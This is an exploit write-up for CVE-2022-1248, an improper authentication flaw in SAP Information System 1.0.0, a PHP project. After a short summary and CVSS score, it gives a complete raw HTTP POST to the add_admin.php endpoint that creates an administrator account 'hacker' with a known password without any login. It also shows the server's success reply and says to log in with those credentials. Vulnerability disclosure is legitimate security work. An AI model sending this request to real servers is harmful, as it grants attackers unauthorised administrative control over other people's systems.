# Exploit Title: SAP Information System 1.0.0 - Improper Authentication
# Date: 06/04/2022
# CVE: CVE-2022-1248
# Exploit Author: Mr Empy
# Software Link:
https://www.sourcecodester.com/php/15262/sap-information-system-using-phppdo-oop.html
# Version: 1.0.0
# Tested on: Linux


Title:
================
SAP Information System 1.0.0 - Improper Authentication


Summary:
================
SAP Information System version 1.0.0 suffers from an improper
authentication vulnerability that allows a malicious user to create an
administrative account without needing to authenticate. The POST request is
sent to the /SAP_Information_System/controllers/add_admin.php endpoint. The
problem occurs due to lack of session verification in the request.


Severity Level:
================
7.3 (High)
CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L


Affected Product:
================
SAP Information System version v1.0.0


Steps to Reproduce:
================

Steps to Reproduce:

1. Copy this request and change the host and send it to the server:

############################################

POST /SAP_Information_System/controllers/add_admin.php HTTP/1.1
Host: target.com
Content-Length: 345
Accept: */*
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like
Gecko) Chrome/95.0.4638.69 Safari/537.36
Content-Type: multipart/form-data;
boundary=----WebKitFormBoundaryYELEK8fMdX63l0iI
Origin: http://target.com
Referer: http://target.com/SAP_Information_System/Dashboard/pages/Admin.php
Accept-Encoding: gzip, deflate
Accept-Language: pt-PT,pt;q=0.9,en-US;q=0.8,en;q=0.7
Cookie: PHPSESSID=jjnkf4nmpdm7sca82btt2r4s1c
Connection: close

------WebKitFormBoundaryYELEK8fMdX63l0iI
Content-Disposition: form-data; name="username"

hacker
------WebKitFormBoundaryYELEK8fMdX63l0iI
Content-Disposition: form-data; name="password"

P@ssw0rd!
------WebKitFormBoundaryYELEK8fMdX63l0iI
Content-Disposition: form-data; name="user"

admin
------WebKitFormBoundaryYELEK8fMdX63l0iI--

############################################

Reply:

############################################

HTTP/1.1 200 OK
Date: Tue, 05 Apr 2022 16:15:46 GMT
Server: Apache
Vary: Accept-Encoding
Content-Length: 267
Connection: close
Content-Type: text/html; charset=UTF-8


<script type="text/javascript">setTimeout(function () { swal("Add Admin
Successfully!","Message!","success");}, 1000);</script><script
type="text/javascript">setTimeout(function(){window.location =
"/SAP_Information_System/Dashboard/pages/Admin.php"},1000)</script>

############################################

2. Go to the login page and enter the hacker:P@ssw0rd! credential. After
that you will be logged in with an administrative account.